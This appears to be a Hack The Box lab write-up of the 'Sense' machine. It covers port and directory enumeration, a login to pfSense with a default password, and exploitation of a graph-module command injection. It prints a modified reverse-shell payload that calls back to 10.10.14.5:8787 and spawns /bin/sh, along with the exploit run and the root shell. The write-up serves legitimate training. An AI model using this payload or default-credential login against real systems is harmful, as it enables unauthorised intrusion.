Welcome to the Sense writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Sense
tags: HTB
Easy
FreeBSD
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: FreeBSD
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
# nmap -p- -T4 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:17 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.094s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 91.70 seconds
Now that we know the open ports, let's scan them in depth.
# nmap -A -Pn -p 80,443 sense.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-21 19:19 CET
Nmap scan report for sense.htb (10.10.10.60)
Host is up (0.093s latency).
PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://sense.htb/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open ssl/http lighttpd 1.4.35
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.35
|_http-title: 501
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running (JUST GUESSING): Comau embedded (92%)
Aggressive OS guesses: Comau C4G robot control unit (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 93.34 ms 10.10.14.1
2 93.34 ms sense.htb (10.10.10.60)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.55 seconds
Accessing to the webserver we can find a pfSense
installation running.
Gobuster
# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.60/ -x php,txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.60/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2021/03/21 21:04:18 Starting gobuster
===============================================================
/index.php (Status: 200)
/help.php (Status: 200)
/themes (Status: 301)
/stats.php (Status: 200)
/css (Status: 301)
/edit.php (Status: 200)
/includes (Status: 301)
/license.php (Status: 200)
/system.php (Status: 200)
/status.php (Status: 200)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/exec.php (Status: 200)
/widgets (Status: 301)
/graph.php (Status: 200)
/tree (Status: 301)
/wizard.php (Status: 200)
/shortcuts (Status: 301)
/pkg.php (Status: 200)
/installer (Status: 301)
/wizards (Status: 301)
/xmlrpc.php (Status: 200)
/reboot.php (Status: 200)
/interfaces.php (Status: 200)
/csrf (Status: 301)
/system-users.txt (Status: 200)
/filebrowser (Status: 301)
/%7Echeckout%7E (Status: 403)
===============================================================
2021/03/21 22:50:55 Finished
===============================================================
Well, inside system-users.txt
we can find a username and a hint for the password.
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
Testing with the user rohit
and the default password pfsense
we managed to access the panel.
Exploitation
Well, looking a bit on the internet, I have seen that the graph
module has a vulnerability with which we can perform code injection
. Also, I found this page where a Python
exploit is available.
In the exploit, originally you have to modify the lines 27, 28, 29, 30 and 31
.
username = "admin"
password = "pfsense"
listener_ip = "10.0.0.1"
listener_port = "4444"
target_ip = "10.0.0.2"
But in my case, the payload with nc
did not work for me and withmsf
it established a connection but it was lost instantly so, I have modified the nc
payload so that it executes a reverse shell inPython
, escaping the quotes properly.
# php/reverse_php
php_reverse_shell = """
exec('python -c \\\'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8787));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\\\'');
"""
Now, we only have to put a terminal to listen and run the exploit!
# python3 pfSenseRCI.py nc
[*] setting payload to nc reverse shell (catch with 'nc -lvp PORT')
[*] exploiting pfsense_graph_injection_exec
[*] generating obfuscated/encoded reverse shell payload for 10.10.14.5:8787
[+] generated obfuscated/encoded payload
[+] authenticating to firewall with (rohit:pfsense)
[+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[+] authentication successful!
[+] grabbed CSRF token: sid:250446f28dd5000ed78a968a8f10282c7ce75bae,1616443931
[*] octal encoding payload
[+] encoding complete
[*] injecting into https://10.10.10.60/status_rrd_graph_img.php
[+] exploit code injected successfully
[*] triggering the exploit (make sure to catch on 10.10.14.5:8787)
And enjoy being root
!!
# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.60] 23408
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /home/rohit/user.txt
CENSORED_FLAG
# cat /root/root.txt
CENSORED_FLAG
#